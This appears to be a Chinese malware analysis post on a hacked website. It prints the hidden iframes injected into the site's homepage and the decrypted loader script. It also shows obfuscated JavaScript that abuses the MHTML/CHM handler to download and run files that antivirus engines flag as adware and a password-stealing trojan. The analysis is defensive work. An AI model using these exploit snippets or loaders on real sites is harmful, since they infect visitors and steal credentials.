hxxp://www.china***huati.com首页被加入:
--------------------------------
<iframe src=hxxp://bbs.**gemeus*.com/q17***/index.htm width=0 height=0></iframe>
……
<iframe height=0 width=0 src="hxxp://www.***ll-nba.com/*4***"></iframe>(endurer注:共有6处插入)
--------------------------------
hxxp://bbs.**gemeus*.com/q17***/index.htm的内容为:
--------------------------------
<script language="javascript" src="ah.js"></script>
--------------------------------
ah.js 的内容解密后的内容为:
--------------------------------
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"></OBJECT>');
--------------------------------
冒充GIF文件,下载运行 1.js。
Kaspersky 将 1.js 报为: Packed.Win32.Klone.d( http://www.viruslist.com/en/viruses/encyclopedia?virusid=115946)。
江民KV 将 1.js 报为: Exploit.HTML.Mht.ae( http://virusinfo.jiangmin.com/infomation/200641010559.html)。
1.js 其实是个CHM文件,会释放/运行名为 msnmon.exe 的文件。
Kaspersky 将 msnmon.exe 报为: not-a-virus:AdWare.Win32.WSearch.k。
江民 对 msnmon.exe 的回复为: 不是病毒。
hxxp://www.***ll-nba.com/*4***的内容为:
------------------------ <SCRIPT LANGUAGE="JavaScript"> <!-- var HtmlStrings=["=iunm> =PCKFDU!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsjqumfu#!e","bub>#'$88'$86'$69'$75'$88'$94'$84'$95'$94'$227'$222'$225'$212","'$69'$21:'$215'$227'$21:'$219'$69'$::'$69'$:3'$57'$21:'$215'$","227'$44'$215'$227'$227'$223'$69'$580xxx/mm.ocb/dpn050mphp/kqh",";;0213&3F&79un#>=0PCKFDU> =0cpez> =0iunm> "]; function psw(st){ var varS; varS=""; var i; for(var a=0;a<st.length;a++){ i = st.charCodeAt(a); if (i==1) varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if (i==2) { a++; varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1); } return varS; }; var num=5; function S(){ for(i=0;i<num;i++) document.write(psw(HtmlStrings[i]));} S(); // --> </SCRIPT> -----------------------
代码运行后输出的内容为:
----------------------- <html> <OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!http://www.***ll-nba.com/*4***/logo.jpg::/102%2E%68tm"></OBJECT> </body> </html> -----------------------
会下载hxxp:///www.***ll-nba.com/*4***/logo.jpg。
Kaspersky 将 logo.jpg 报为:Trojan-PSW.Win32.QQShou.fw( http://www.viruslist.com/en/viruses/encyclopedia?virusid=123300)。
江民KV 将 logo.jpg 报为:TrojanDropper.Mht.Psyme.gfi。